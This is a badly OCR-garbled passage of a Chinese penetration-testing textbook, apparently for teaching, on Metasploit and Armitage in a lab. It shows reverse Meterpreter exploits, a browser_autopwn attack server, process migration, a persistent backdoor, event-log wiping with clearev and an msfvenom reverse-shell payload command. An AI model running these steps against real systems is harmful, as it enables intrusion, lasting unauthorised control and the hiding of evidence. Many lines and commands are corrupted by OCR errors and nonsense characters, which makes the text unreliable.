msf exploit( NEM 
图 7-15 ”使 用 “show options” 来 但 看 这 个 模块 的 选项 


exploit (easyfilesharing seh)>set payload windows/meterpreter/reverse 


exploit (easyfilesharing seh)>set lhost 192.168.169.130 


exploit (easyfilesharing seh)»set rhost 192.168.169.131 
exploit (easyfilesharing seh)»set rport80 
exploit (easyfilesharing seh)»exploit 





设 症 完成 之 后 ， 执 行 的 结 东 如 图 7-16 所 示 。 


msf exploit( ) > exploit 


Started reverse TCP handler on 192.168.169.130:4444 
192.168.169.131:80 - 192.168.169.131:80 - Sending exploit... 
192.168.169.131:80 - Exploit Sent 

Sending stage (957487 bytes) to 192.168.169.131 


Meterpreter session 1 opened (192.168.169.130:4444 -> 192.168.169.131:49174) at 201 
7-07-29 03:50:38 -0400 





meterpreter > J 
图 7-16 “使 用 exploit 命 令 进 行 渗透 


从 图 7-16 可 以 看 到 我 们 已 经 打开 了 一 个 Session， 也 束 是 开局 了 对 目 
标 〈192.168.169.131) 的 控制 。 而 且 我 们 现在 获得 了 一 个 Meterpreter， 
利用 它 我 们 就 可 以 完成 对 目标 主机 的 远程 控制 。 


7.5 ”使 用 Metasploit 对 客户 端 发 起 攻击 


剖面 第 7.3 节 和 第 7.4 两 节 中 介绍 的 都 是 主动 的 攻击 方式 ， 除 此 以 
外 ，Metasploit 中 还 提供 了 大 量 的 被 动 攻 击 方式 。 这 种 攻击 方式 的 思路 
很 特殊 ， 往 往 需 要 得 到 受害 目标 用 户 的 配合 才能 成 功 。 但 是 在 日 萌生 活 
式 的 成 功率 往往 比 主动 攻击 要 喜 ， 所 以 也 是 重点 要 防范 
Jg. 


Vr Ae RANIA SEDIS XE EH T SEE SJ OA EREN IUS 
AES BTE HUTE Hee FH IS], [HEU B fS H HI Xe 0E TE RTI] BP 0] E A 
JA C. RIT He TDO ES ESSE YO BS e 
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本 ， 如 朱 其 中 未 个 攻击 脚本 攻击 成 芒 的 话 ， 束 会 在 目标 主机 上 建立 一 个 


Meterpreter 会 话 。 
下 面 我 们 以 实例 的 方式 来 介绍 这 个 攻击 的 详细 过 程 ， 在 Metasploit 


有 一 个 browser_autopwn 模 块 。 利 用 这 个 模块 我 们 就 可 以 轻松 地 建立 起 
一 个 攻击 用 的 Web 服 务 器 。 首 先 在 metasploit 中 局 动 这 个 模块 。 


接 下 来 使 用 “show options” 来 查看 这 个 模块 需要 设置 的 参数 。 


执行 的 结果 如 图 7-17 所 示 。 


Module options (auxiliary/server/browser_autopwn) : 


Name Current Setting Required Description 


The IP address to use for reverse-connect payloads 

The local host to listen on. This must be an address 

The local port to listen on. 

Negotiate SSL for incoming connections 

Path to a custom SSL certificate (default is randomly 
URIPATH The URI to use for this exploit (default is random) 


Auxiliary action: 


Name Description 





msf auxiliary( NEM | 


图 7-17  fUfrbrowser autopwnT5i ik [326 JU 


图 7-17 中 必须 的 参数 一 共有 3 个 ， 其 中 LHOST 填 写本 机 的 地 址 即 
可 ， 这 个 地 址 用 来 作为 实现 远程 控制 的 主 控 疾 。SRVHOST 表 示 Web 服 
务 妖 的 地 址 ， 这 个 地 址 保持 默认 即 可 ， 也 束 是 0.0.0.0。SRVPORT 表 示 
Web 服 务 器 的 端口 ， 一 般 设 置 为 80。URIPATH 表 示 Web 服 务 器 的 目录 ， 
一 般 设 置 为 "“/” 即 可 。 


msf auxiliary(browser autopwn) > set LHOST 192.168.169.130 
LHOST -» 192.168.169.130 

msf auxiliary(browser autopwn) » set URIPATH / 

URIPATH => / 

msf auxiliary(browser autopwn) » set SRVPORT 80 

SRVPORT => 80 





好 了 了， 设置 完 这 些 参 数 之 后 ， 就 可 以 启动 这 个 服务 器 了 。 如 图 7-18 
所 示 ， 启 动 的 命令 还 是 “exploit*， 执 行 这 个 命令 就 可 以 在 
192.168.169.130 这 个 地 址 建立 好 一 个 用 来 攻击 的 Web 服务 器 ， 这 个 服务 
器 中 集成 了 多 个 浏览 器 漏洞 。 这 些 漏洞 需要 一 个 个 地 启动 ， 所 以 我 们 需 
要 耐心 等 等 所 有 模块 都 启动 起 来 。 


auxiliary( ) » exploit 
Auxiliary module execution completed 


Setup 
auxiliary( ) 5 
Starting exploit modules on host 192.168.169.130... 


Starting exploit android/browser/webview addjavascriptinterface 
d/meterpreter/reverse tcp 

Using URL: http://0.0.0.0:80/keyafUA0 

Local IP: http://192.168.169.130:80/keyafUAO0 

Server started. 





图 7-18 ”启动 服务 器 
等 所 有 的 模块 都 成 功 局 动 之 后 ， 我 们 将 这 个 链接 发 送 给 上 日 标 主机 ， 


s 


这 里 测试 环境 下 的 目标 为 Windows 7. 1H HJI V. AFTE gX ZS, E 
在 ， 在 日 标的 浏览 器 上 打开 这 个 链接 ， 如 图 7-19 所 示 。 


e 


S CR 





Æ Loading T-A” 


图 7-19 ”使 用 IE 8X 75.287; Iu] 32€] Hc 25-88 


现在 我 们 返回 到 Kali Linux 2 虚拟 机 ， 可 以 看 到 这 时 这 个 服务 需 已 经 
了 ， 它 开始 不 断 地 同 目 标 浏 览 亏 发 送 各 种 渗透 攻击 模块 ， 如 儿 
7-20FHT27R.« 


root(Qkali: ~ 9 o9 
File Edit View Search Terminal Help 





Server started. 
Handling '/' 
Handling '/?sessid=V2luZG93cyBYUDplbmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaWw5lZDpTUDM6ZW4t 
dXM6eDg20k1TSUU6Ni4w0g%3d%3d ' 

JavaScript Report: Windows XP:undefined:undefined:undefined:SP3:en-us:x86:MSIE:6.0: 

Responding with 14 exploits 

192.168.169.132 java atomicreferencearray - Sending Java AtomicReferenceArray Type 
Violation Vulnerability 

192.168.169.132 java atomicreferencearray - Generated jar to drop (5126 bytes). 

192.168.169.132 java atomicreferencearray - Sending Java AtomicReferenceArray Type 
Violation Vulnerability 

192.168.169.132 java atomicreferencearray - Generated jar to drop (5126 bytes). 

192.168.169.132 java jrel7 jmxbean - handling request for /KlsMRql 

192.168.169.132 java jrel7 jmxbean - handling request for /KlsMRql/ 

192.168.169.132 java jrel7 jmxbean - handling request for /KLlsMRqL 

192.168.169.132 java atomicreferencearray - Sending Java AtomicReferenceArray Type 
Violation Vulnerability 

192.168.169.132 java atomicreferencearray - Generated jar to drop (5126 bytes). 

192.168.169.132 java jrel7 jmxbean - handling request for /KlsMRql/ 

192.168.169.132 java jrel7 reflection types - handling request for /eCzts 

192.168.169.132 java jrel7_reflLection types - handling request for /eCzts/ 

192.168.169.132 java_jrel7_jmxbean - handling request for /KlsMRql 

192.168.169.132 java atomicreferencearray - Sending Java AtomicReferenceArray Type 
Violation Vulnerability 

192.168.169.132 java atomicreferencearray - Generated jar to drop (5126 bytes). 

192.168.169.132 java jrel7 jmxbean - handling request for /KlsMRql/ 

192.168.169.132 java jrel7 reflection types - handling request for /eCzts 

192.168.169.132 java jrel7 reflection types - handling request for /eCzts/ 


图 7-20 ”渗透 进行 中 


在 发 送 这 些 渗 透 模 块 的 过 程 中 ， 如 果 目 标 洲 贤 右 存 在 源 润 的 话 ， 和 针 
对 访 漏 铜 的 渗透 模块 融会 利用 访 漏 洞 在 目标 主机 上 建立 起 一 个 和 服务 喜 
之 间 的 会 话 ， 如 同 图 7-21 中 方 框 中 的 内 容 session 3 一 样 ， 需 要 注意 的 
是 ， 并 不 是 所 有 的 会 话 都 是 成 功 的 ， 有 的 会 话 可 能 建立 的 并 不 成 功 ， 例 
如 图 7-21 中 的 Session 4. 


root(Qkali: ~ ooo 
File Edit View Search Terminal Help 
192.168.169.133 java atomicreferencearray - Sending Java AtomicReferencCeArr 国 
ay Type Violation Vulnerability 
192.168.169.133 java atomicreferencearray - Generated jar to drop (5126 byt 


es). 
192.168.169.133 java jrel7 provider skeleton - handling request for /dLpXou 
CS 
192.168.169.133 java verifier field access - Sending Java Applet Field Byte 
code Verifier Cache Remote Code Execution 
192.168.169.133 java verifier field access - Generated jar to drop (5126 by 


es). 
192.168.169.133 java jrel7 provider skeleton - handling request for /dLpXou 


[#] Sendi stade (957487 bvtes) to 192.168.169. 
] CIPNODUSS session 3 opened (192.168.169. xm EXE -» 192.168.169.133:49203) 
at 2017-10-28 08:03:46 -0400 
CERTUM AUFS (132. uui 109.130:3333 -> 19yZ.100.109.133:49Z203) processing E Gn 
ialAutoRunScript 'migrate -f' 
[!] Meterpreter scripts are deprecated. Try post/win om rate. 
[!] Example: run post/windows/manage/migrate OPTION-value [...] 
Sending stage (49645 bytes) to 192.168.169.133 
Meterpreter session 4 opened (192.168.169.130:7777 -» 192.168.169.133:49204) 
at 2017-10-28 08:04:22 -0400 
19 2. 168. si Hn : ed session 4 closed. Reason: Died 


图 7-21 利用 浏览 器 漏洞 建立 的 会 话 


图 7-21 中 的 session 3 是 一 个 成 功 建立 的 会 话 ， 现 在 即使 整个 渗透 过 
程 没 有 结束 ， 我 们 也 可 以 利用 这 个 会 话 对 目标 主机 进行 控制 了 了， 首先 使 
用 “Ctrl+C” 组 合 键 来 结束 渗透 过 程 ， 这 时 会 返回 到 browner -autopwn tK Ik 
z 制 ， 然 后 使 用 “back”* 命 令 返 回 到 Metasploit 的 控制 。 现 在 这 个 服务 器 可 
能 与 目标 建立 了 多 个 会 话 ， 所 以 可 以 使 用 sessions -i* 来 显示 所 有 的 这 些 
会 话 ， 关 键 是 要 注意 这 个 会 话 前 面 的 ID， 例 如 现在 显示 这 个 会 话 为 3， 
如 图 7-22 所 示 。 





dows WIN-N8GQG18FRTI\Adm or @ WIN-N8GQG18FRTI 


3 meterpreter x86/win 
. 169 . 130 :3333 -> 192.168.169.133:49203 (192. 158. 169. 133) 





图 7-22 TUBE Me 
这 里 显示 只 建立 好 了 一 个 会 话 ， 那 么 我 们 就 使 用 这 个 会 话 来 控制 日 


标 主 机 ， 使 用 的 命令 格式 为 “sessions -i” 加 上 要 使 用 会 Std. 例如 本 例 
中 使 用 会 话 的 Id 就 是 3。 


执行 的 结果 如 图 7-23 所 示 。 


msf > sessions -i 3 
Starting interaction with 3... 





meterpreter > B 


图 7-23 ”切换 到 Id 为 3 的 会 话 


图 7-23 中 出 现 了 我 们 熟悉 的 meterpreter 命 令 行 控制 了 ， 现 在 就 可 以 
按照 之 前 介绍 的 方式 来 控制 目标 了 ， 但 是 需要 注意 的 是 meterpreter 必 须 
要 附加 在 目标 的 一 个 进程 上 ， 如 果 这 个 进程 结束 了 ， 那 么 meterpreter 的 
控制 也 会 被 终结 。 而 现在 我 们 所 使 用 的 meterpreter 正 是 附加 在 目标 的 浏 
览 民 进 程 中 ， 但 是 目标 用 户 随 时 有 可 能 关闭 浏览 硕 ， 这 时 我 们 的 
meterpreter 的 控制 也 束 中 断 了 ， 上 所 以 必须 尽快 将 这 个 meterpreter 附 加 到 
AAA 
7/-2AHTzR« 


meterpreter > 


Process List 


Session User Path 


[System Process] 
System 

smss.exe NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 

NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 

NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 

NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe 
NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe 
NT AUTHORITYNSYSTEM C:\Windows\system32\services.exe 
NT AUTHORITYNSYSTEM C:\Windows\system32\lsass.exe 

NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe 

NT AUTHORITYNSYSTEM C:\Windows\system32\svchost.exe 
NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware To 
NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe 
NT AUTHORITYNLOCAL SERVICE C:\Windows\System32\svchost.exe 
NT AUTHORITY\SYSTEM C:\Windows\System32\svchost .exe 


csrss.exe 
csrss.exe 
wininit.exe 
winlogon.exe 
services.exe 
lsass.exe 
lsm. exe 
svchost.exe 
vmacthlp.exe 
svchost.exe 
svchost.exe 
svchost.exe 


图 7-24 ”使 用 ps 命令 列 出 所 有 的 进程 


通 利 我 们 需要 选择 一 个 不 会 被 结束 的 系统 进程 ， 例 如 系统 进程 
explorer.exe， 记 住 这 个 进程 的 pid， 也 就 是 2800， 如 图 7-25 所 示 。 





DOODOOODOOODOOPOPOOO 


java.exe WIN-N8GQG18FRTIMAdministrator C:\Program Files\Java\ijre 

conhost .exe WIN-N8GQG18FRTIMAdministrator C:\Windows\system32\conhd 

WmiPrvSE.exe NT AUTHORITYNSYSTEM C:\Windows\system32\wbem 

iexplore.exe WIN-N8GQG18FRTIMAdministrator C:\Program Files\Internet 
WTN -NRACNAOGIREDTT\ Adminictratnr C*NWin INT-ÀW 3T] 


c uct ^ d 
explorer.exe WIN-N8GQG18FRTIMAdministrator C:\Windows\Explorer . EXE 





[7-25  fr&explorerli']pid 


附加 到 其 他 进程 的 命令 为 migrate， 使 用 这 个 命令 将 meterpreter 迁 移 
到 进程 explorer.exe 上， 迁移 的 命令 格式 为 “migrate” 加 上 目标 进行 的 Id。 


meterpreter > migrate 2800 


执行 的 命令 如 图 7-26 所 示 。 


meterpreter > migrate 2800 
Migrating from 2200 to 28090... 





Migration completed successfully. 


图 7-26 成功 地 将 进程 迁移 到 2800 


成 功 执 行 迁移 进程 之 后 ， 我 们 束 可 以 使 用 getpid 和 getuid 来 但 看 当前 
使 用 的 进程 和 用 户 名 ， 执 行 的 过 程 如 图 7-27 所 示 。 


meterpreter > getpid 
Current pid: 2800 


meterpreter > getuid 
Server username: WIN-N8GQGISFRTIMAdministrator 





图 7-27 使 用 getpid 和 getuid 命 令 


现在 我 们 已 经 成 功 地 渗透 进入 到 目标 计算 机 ， 现 在 的 meterpreter 仅 
仪征 工作 在 目标 主机 的 内 存 中 ， 虽 然 这 样 的 好 处 是 可 以 恩 过 很 多 杀毒 软 
件 的 查 杀 ， 但 是 如 果 目 标 主机 执行 了 香 局 操作 之 后 ，meterpreter 束 无 法 
使 用 了 。 那 么 我 们 必须 想 办 法 来 保持 对 s 标 计算 机 的 控制 连接 。 这 一 点 
可 以 有 很 多 方式 来 实现 ， 这 里 面 我 们 介绍 一 种 最 为 有 效 有 的 方法 ， 那 就 是 
在 目标 计算 机 上 安装 一 个 水 久 性 的 后 | 文件 这 样 无 论 是 目标 主机 重 
司 ， 或 者 目标 主机 修复 了 这 个 漏洞 ， 我 们 依然 可 以 使 用 这 个 后 门 文件 来 
控制 目标 。 这 里 面 使 用 persistence 模 块 来 完成 这 个 操作 ， 执 行 的 命令 为 


rune 


执行 的 结果 如 图 7-28 所 示 。 


meterpreter > run persistence 


[!] Meterpreter scripts are deprecated. Try ee el persistence exe. 
[!] Example: run post/windows/manage/persistence exe OPTION=value [...] 
iiid ei ui 


Res nup created at e: msf4/logs/persistence/WIN-N8GQG18FRTI 2 
0171028. 5203 /WIN- " NBGQGTSFRTI 20171028. 2203 


Creating Payload- winddws dion OR TES . tcp LH0ST-192.168.169.130 LPORT-4444 
Persistent agent Script is iri bytes long 
Persistent Script writte C:\Users\ADMINI~ ee ep A caan RAF Tuo. vbs 
Executing script C: User e a -lMAppDataNLocalNTempNcSahRAaFfuo.. vb 
Agent executed with PID 284 

meterpreter > 





[7-28 ”执行 persistence 模 块 


这 个 模块 的 作用 不 同 于 之 前 所 使 用 的 meterpreter， 这 个 目标 文件 将 
会 成 为 目标 系统 的 一 个 系统 服务 。 每 当 目 标 系 统 重新 局 动 时 ， 这 个 服务 
会 随 看 系统 局 动 而 局 动 ， 这 样 丈 不 必 担 心 系统 重 局 造成 控制 中 断 了 。 


态 外 需要 考 碟 的 一 个 问题 是 ， 我 们 对 目标 系统 的 渗透 过 程 可 以 瞒 过 
目标 用 户 的 眼 栈 ， 但 是 这 一 切 都 会 家 系统 以 日 总 的 形式 记录 下 来 ， 如 末 
有 专业 的 人 士 对 这 些 日 志 进 行 审 计 ， 就 会 发 现 目 标 系统 已 经 被 渗透 ， 甚 
全 找到 进行 渗透 的 黑客 。 所 以 我 们 在 成 功 控制 目标 主机 之 后 还 再 要 清除 
系统 的 日 志 ， 这 一 扣 跟 和 罪犯 犯罪 之 后 要 清理 现场 一 样 。 


但 十 证 要 注意 的 是 ， 如 来 我 们 是 出 于 安全 测试 目的 的 话 ， 则 不 要 删 
除 这 些 日 志 ， 因 为 这 些 日 志 可 以 作为 网 络 安全 改进 方面 的 重要 参考 。 


^, 


删除 日 志 的 方法 很 徐 单 ， 只 需要 执行 命令 clearev 即 可 ， 几 7-29 给 出 
了 执行 的 结 


meterpreter > cleare 


V 
Wiping 1405 records from Application... 
Wiping 4503 records from System... 
Wiping 1390 records from Security... 





图 7-29 清除 目标 系统 上 的 日 忘 


好 了 ， 到 此 为 止 ， 我们 已 经 详细 地 介绍 了 如 何 使 用 Metasploit 进 行 
锐 动 的 攻击 。 如 果 你 名 望 详 细 了 解 这 个 工具 的 用 法 ， 可 以 参阅 《精通 
Metasploit EMA ~E. 


7.6 小结 


本 章 介绍 了 如 何 将 远程 控制 工具 发 送 到 目标 主机 上 ， 而 这 一 切 则 要 
依赖 目标 系统 上 的 涯 将 。 鉴 于 汤 润 开发 的 复 森 度 较 大 ， 我 们 在 学 习 的 过 
程 中 选择 了 使 用 前 人 已 经 写 好 的 针对 漏 铀 的 渗透 模块 代 人 了 但 。 本 章 以 网 络 
安全 渗透 测试 工具 Metasploit 的 正式 介绍 作为 开头 ， 这 是 一 葡 极 为 流行 
的 框架 工具 ， 里 面 集 成 了 世界 上 大 部 分 漏洞 的 渗透 模块 。 然 后 以 实例 的 
形式 开始 介绍 Metasploit 框 染 的 使 用 方法 ， 这 是 一 球 极 为 复 洒 的 工具 ， 
本 和 章 仅 仅 对 其 核心 功能 进行 了 介绍 。 本 章 一 共 使 用 了 3 个 案例 来 介绍 
Metasploit 的 使 用 方法 ， 首 先 我 们 将 漏 铜 历史 上 最 为 经典 的 MS08-067 作 
为 案例 ， 讲 解 了 如 何 针 对 操作 系统 进行 攻击 ; 然后 针对 更 先进 的 
Windows t (Windows 7 或 者 Windows 10) 提供 了 渗透 思路 ， 通 
种 很 难 直 接 利 用 这 种 操作 系统 的 漏洞 ， 因 而 我 们 采用 了 迁 回 的 方式 ， 找 
出 运行 在 系统 上 的 软件 的 漏洞 进行 渗透 ， 最 后 我 们 提供 了 一 种 针对 目标 
浏览 右 的 和 被动 入 侵 方 式 ， 这 种 方式 在 实际 中 应 用 得 更 为 有 效 。 


通过 对 这 3 个 宁 例 的 学 习 ， 我 们 学 习 了 Metasploit 的 基本 用 法 ， 但 是 
对 于 初学 者 来 说 ，Metasploit 的 命令 控制 方式 是 很 难 营 握 的 ， 所 以 在 下 
一 章 我 们 将 会 介绍 Metasploit 的 图 形 化 操作 方法 。 


PER 
Armitage 


在 第 7 章 中 ， 我 们 已 经 用 实例 展示 了 Metasploit 的 强大 功能 ， 不 过 对 
于 初学 者 来 说 ， 命 令 行 是 一 种 十 分 困难 的 操作 方式 。 虽 然 得 到 了 很 多 经 
验 丰 是 的 黑客 的 喜爱 ， 但 是 这 误工 上 共 在 普及 的 过 程 中 并 不 顺利 ， 对 于 这 
一 点 ， 在 我 这 些 年 的 网 络 安全 教育 经 历 中 感受 十 分 深刻 。 学 生 们 对 这 个 
工具 即使 再 怎么 喜爱 ， 他 们 中 的 大 多 数 最 终 还 是 止步 于 Metasploit 复 杂 
的 命令 之 前 。 


其 实 命令 行 的 操作 方式 之 所 以 让 很 多 人 感到 困难 ， 主 要 是 由 于 大 多 
数 人 从 开始 就 习惯 了 Windows 操 作 系 统 以 及 这 个 系统 中 的 图 形 化 操作 软 
件 。 因 此 如 果 Metasploit 有 一 个 图 形 化 的 操作 界面 ， 那 么 学 习 起 来 将 会 


征 一 个 十 分 居 快 的 过 程 。 


Armitage 束 是 一 蒜 使 用 Java 语 言 为 Metasploit 编 写 的 图 形 化 操作 界 
面 ， 利 用 它 就 可 以 轻松 地 使 用 Metasploit 中 的 各 种 模块 来 实现 自动 化 攻 
击 。 在 这 一 章 中 ， 我 们 将 会 使 用 Armitage 来 演示 如 何 使 用 Metasploit 对 日 
标 进 行 攻击 有 的 完整 过 程 ， 本 章 的 内 容 包 括 : 


e 启动 Armitage 

e {tH Armitage EX 4 Ta rm A E 32 ti 

e 使 用 Armitage 扫 描 网 络 

e 使 用 Armitage 针 对 漏 调 进 行 攻 击 

e 使 用 Armitage 完 成 渗透 之 后 的 后 续 工 作 


8.1 局 动 Armitage 


需要 注意 的 是 ，Armitage 本 吴 并 不 是 一 秋 具 备 渗 透 能 力 的 软件 ， 实 
际 上 它 只 是 Metasploit 的 图 形 化 操作 界面 ， 也 就 是 说 如 果 直 接 使 用 
Metasploit 的 话 ， 你 必须 要 通过 输入 命令 完成 操作 ， 而 Armitage 则 简化 了 
这 些 操 作 ， 你 所 做 的 就 如 同 在 Windows 里 一 样 ， 只 要 用 鼠标 就 可 以 完成 
所 有 的 操作 。 


在 最 新 版 的 Kali Linux 2 中 ， 你 可 以 很 轻松 地 找到 这 个 Armitage， 如 
图 8-1 所 示 。 





图 8-1 在 Apploications 中 局 动 Metasploit 


需要 注意 的 是 , 在 局 动 Armitage 之 前 , 需要 先 对 Metasploit 进 行 配 
He 


如 果 你 使 用 的 是 Kali Linux 1.0 系 列 的 话 ， 需 要 输入 : 


Service postgresql start 





Service Metasploit start 


pee Metasploit stop 
如 果 你 使 用 的 是 Kali Linux 2.0 系 列 的 话 ， 就 需要 输入 : 


然后 输入 命令 “Armitage”， 如 图 8-2 所 示 。 








图 8-2 ”在 终端 中 启动 Armitage 


这 时 你 会 看 到 一 个 提示 ， 如 图 8-3 所 示 。 





Start Metasploit? x 


A Metasploit RPC server is not running or 
not accepting connections yet. Would you 
like me to start Metasploit's RPC server 
for you? 





图 8-3 -Metasploit 7JRPCJH 25 3 Jci 29] 


这 里 是 询 问 你 是 否 打开 Metasploit 的 RPC 服 务 ， 我 们 需要 选 | 
择 “Yes”， 然 后 就 是 启动 的 进程 ， 如 图 8-4 所 示 。 注 意 这 里 出 现 “ 连 接 被 
拒绝 ?时 ， 只 需 等 竺 即 可 。 


Connecting to 127.0.0.1:55553 
t.ConnectException: Conne 


java.ne 





图 8-4 连接 到 Metasploit 


M. su 以 后 ， 你 就 可 以 看 到 如 图 8-5 所 示 的 Armitage 的 工作 
HB T o 








Kl8-5 ”局 动 之 后 的 Armitage 


8.2 ”使 用 Armitage 生 成 被 控 端 和 主 控 端 


下 面 我 们 来 看 一 下 Armitage 的 工作 界面 ， 如 图 8-6 所 示 。 











图 8-6 ”Armitage 的 工作 界面 


自 先 我 们 在 区 域 1 中 选中 payload， 然 后 依次 点 
击 “windows”/“meterpreter”， 百 到 找到 我 们 所 需要 的 攻击 载 何 ， 如 网 8-7 
HIZR o 











图 8-7 dX$flmeterpreter reverse tcp 
HETANA Wea H uAS-8PTZRÉS BI. 


windows/meterpreter. reverse. tcp ooo 
Windows Meterpreter Shell, Reverse TCP Inline 


Connect back to attacker and spawn a Meterpreter shell 


^ vw 





| Option à | Value 

Encoder x86/shikata_ga_nai 
EXITFUNC process 
EXTENSIONS 

EXTINIT 

Iterations 3 
KeepTemplateWorking 

LHOST 192.168.79.128 
LPORT 1668 

Template 4 


Output: |multi/handler v] 


LJ Show advanced options 


Launch 
图 8-8 X meterpreter reverse tcp 进行 设置 
图 8-8 中 其 实 是 为 windows/meterpreter/revese_tcp 这 个 发 出 去 的 攻击 
载荷 创建 了 一 个 控制 端 ，Metasploit 中 也 将 这 个 控制 端 称 为 handler。 但 
是 我 们 可 能 要 控制 多 个 攻击 载 傈 ， 所 以 要 将 这 个 handler 设 置 得 跟 攻 击 载 
何 一 样 。 


我 们 之 前 产生 攻击 载 合 的 命令 是 : 


msfvenom -p windows/meterpreter/reverse tcp LHOST=192.168.79.128 LPORT-500 





O -f exe -o /root/payload.exe 


Hir Ea E gi PEE A5 [8] H5] 308 75; Ze Pr RH PIS D. BERA TK im O e ER 
为 5000， 如 图 8-9 所 示 。 


eti windows/meterpreter. reverse tcp o o o 


etg 
S Windows Meterpreter Shell, Reverse TCP Inline 
etl Connect back to attacker and spawn a Meterpreter shell 





bin 
re = 
id | 9ption à | Value 
| å 
"T Iterations 3 
vel KeepTemplateWorking 
Yell! | un * 






| .PonT 5000 U| 


Output: |multi/handler M 


|] Show advanced options 





| Launch | 


图 8-9 Wfmeterpreter reverse tcpJLPORT Y & 735000 


XEM TEIRRI m 11 A HFE Y —^ P 39b) a, IU d 
LL n] AHRR B 384119 G1 SE FIC RE ER, "n 8-10pT 
不 。 











msf exploit( ) > 


图 8-10” 目 动 打开 的 handler 


接 下 来 ， 我 们 只 需要 在 目标 计算 机 上 执行 这 个 payload， 残 可 以 使 用 
这 个 handler 来 控制 目标 计算 机 了 。 

现在 将 root 目 录 中 的 payload 移 动 到 目标 的 Windows 操 作 系 统计 算 机 
中 ， 当 这 个 文件 执行 之 后 ， 我 们 就 可 以 从 远程 控制 目标 了 。 控 制 的 方式 
与 之 前 章节 中 介绍 的 一 样 。 


8.3 ”使 用 Armitage 扫 摘 网 络 


Armitage 中 提供 了 一 些 彰 用 的 扫 摘 蕊 能 ， 这 些 功能 来 目 于 Nmap， 
这 样 的 话 ， 我 们 无 需 再 在 两 个 工具 之 间 进 行 切换 。 在 Armitage 中 残 可 以 
完成 所 有 的 这 些 工 作 。 首 先 我 们 使 用 Nmap 来 扫 摘 主机 系统 ， 默 认 会 扫 
描 同 一 网 段 内 的 所 有 活跃 主机 ， 扫 摘 的 方式 是 单 击 菜单 栏 上 的 Hosts 选 
项 ， 然 后 在 下 拉 有 来 早 中 选中 “Nmap Scan”， 如 图 8-11 所 示 。 


Armitage 


Armitage View Bae Attacks Workspaces Help 





|» i auxiliary Import Hosts 
* (B exploit Add Hosts... 
"(By payload [TEST 
~ 局 post MSF Scans... 
DNS Enumerate 









d | Intense Scan 
Intense Scan + UDP 
Intense Scan, all TCP ports 



















Clear Database Intense Scan, no ping 
Ping Scan 


Quick Scan 







Quick Scan (O5 detect) 
Comprehensive 





Console X 


图 8-11 ”在 Armitage 中 使 用 Nmap 对 目标 进行 扫 插 


“Nmap Scanm” 中 一 共 提 供 了 8 种 扫 搬 方式 ， 这 里 耐 几 平 泗 主 了 Nmap 
的 所 有 经 典 扫 摘 方 法 。 其 中 Itense 是 深度 扫 摘 ，Quick 是 快速 扫 搞 ，Ping 
扫描 指 的 是 仅仅 使 用 ping 命 令 扫 描 。 这 次 我 们 使 用 一 次 “Quick Scan. COS 
detect) ”， 这 是 一 个 快速 扫描 模式 ， 但 是 会 将 操作 系统 的 区 型 扫 摘 出 
来 。 如 图 8-12 所 示 ， 会 出 现 一 个 扫描 目标 地 址 框 。 





Input & 


w Enter scan range (e.g., 192.168.1.0/24): 
7 
| | 


| Cancel | | OK | 





























图 8-12 输入 要 扫 手 的 地 址 


我 们 这 个 实例 以 Kali Linux 2 虚拟 机 所 在 的 网 络 为 目标 ， 本 机 的 地 址 
为 192.168.169.130， 那 么 目标 就 是 192.68.169.0/24。 填 写 完毕 之 后 ， 单 
击 “OK” 按 钮 即 可 。 


扫 朱 完成 之 后 ， 在 区 域 2 束 会 显示 出 扫描 的 结果 ， 这 些 结果 会 以 系 
统 图 标的 形式 显示 出 来 ， 如 图 8- 13 所 示 。 这 次 一 共 在 192.68.169.0/24 发 
现 了 4 台 活 跃 主机 ， 其 中 192.168.169.1 和 192.168.169.133 的 操作 系统 类 型 
为 Windows 7。192.68.169.132 的 操作 系统 类 型 为 Windows XP。 


接 下 来 需要 找 出 目标 系统 的 漏洞 ， 例 如 “192.68.169.132” 主 机 的 漏 
ili], 正如 我 们 之 前 使 用 漏洞 扫 折 工具 完成 的 那样 ， 这 一 点 用 Armitage 来 
实现 也 非常 价 单 ， 只 需要 移 在 区 域 2 处 选中 “192.68.169.132” 主 机 ， 单 击 
朋 单 栏 上 的 Attacks 选 项 ， 然 后 在 下 拉 有 沫 单 上 选中 “Find Attacks” 按 钮 即 
可 ， 如 图 8-14 所 示 。 


Armitage View Hosts Attacks Workspaces 


192. 168. 169. 1 192. 168. : 169. 132 192. 168. 169. 2 192. 168. 169. 133 
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Armitage o oo0 


Armitage View Hosts PHELES Workspaces Help 





> (B auxil 
> @ exploit 

> @ payload 

> (lij post h 


192. 168. 169. 1 192. 168. 169. 132 192. 168. 169. 2 192. 168. 169. 133 





Kla-14 ”使 用 “Find Attacks” 12 £H 


接 下 来 ，Armitage 束 会 调用 Metasploit 中 的 模块 对 目标 进行 扫 摘 从 而 
来 发 现 漏洞 ， 如 网 8-15 所 示 。 


8.4 使 用 Armitage 针 对 漏洞 进行 攻击 


扫 接 结束 以 后 ， 会 弹出 如 图 8-16 所 示 的 一 个 信息 提示 框 ， 表 示 攻 击 
分 析 已 经 结束 ， 并 用 提示 现在 在 “192.68.169.132” 主 机 上 单 击 鼠标 右键 显 
示 的 荣 单 会 多 一 个 选项 ， 这 个 选项 怠 是 “Attack”。 单 击 这 个 按键 ， 只 盐 
要 一 键 就 可 以 完成 对 目标 的 攻击 。 


e 





Progress... e 


Querying explaits... 
linux/misc/hplip hpssd exec 





Cancal 


图 8-15 ”开始 扫 摘 


Message e 


"s Attack Analysis Complete... 
You will now see an 'Attack' menu attached 


to each host in the Targets window. 





Happy hunting! 


图 8-16 ”扫描 结束 
蛙 击 “OK” 按 钮 之 后 ， 再 在 目标 主机 上 单 击 刀 标 右 键 束 可 以 看 


到 “Attack” 选 项， 如 图 8-17 上 所 示 。 


eF EE ~ 

192. 168. 169. 1 
Login 
Services 
scan 
Host 


192,168. 160.1 169 ,2 





C3 


192. 168. 169. 133 
> 


图 8-17 “右键 来 单 上 的 “Attack” 选 项 
里 击 Attack 吏 可 以 显示 出 当前 Metasploit 中 的 所 有 攻击 模 氛 ， 如 图 8- 


18 所 示 。 
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Attack Ld 
E | 


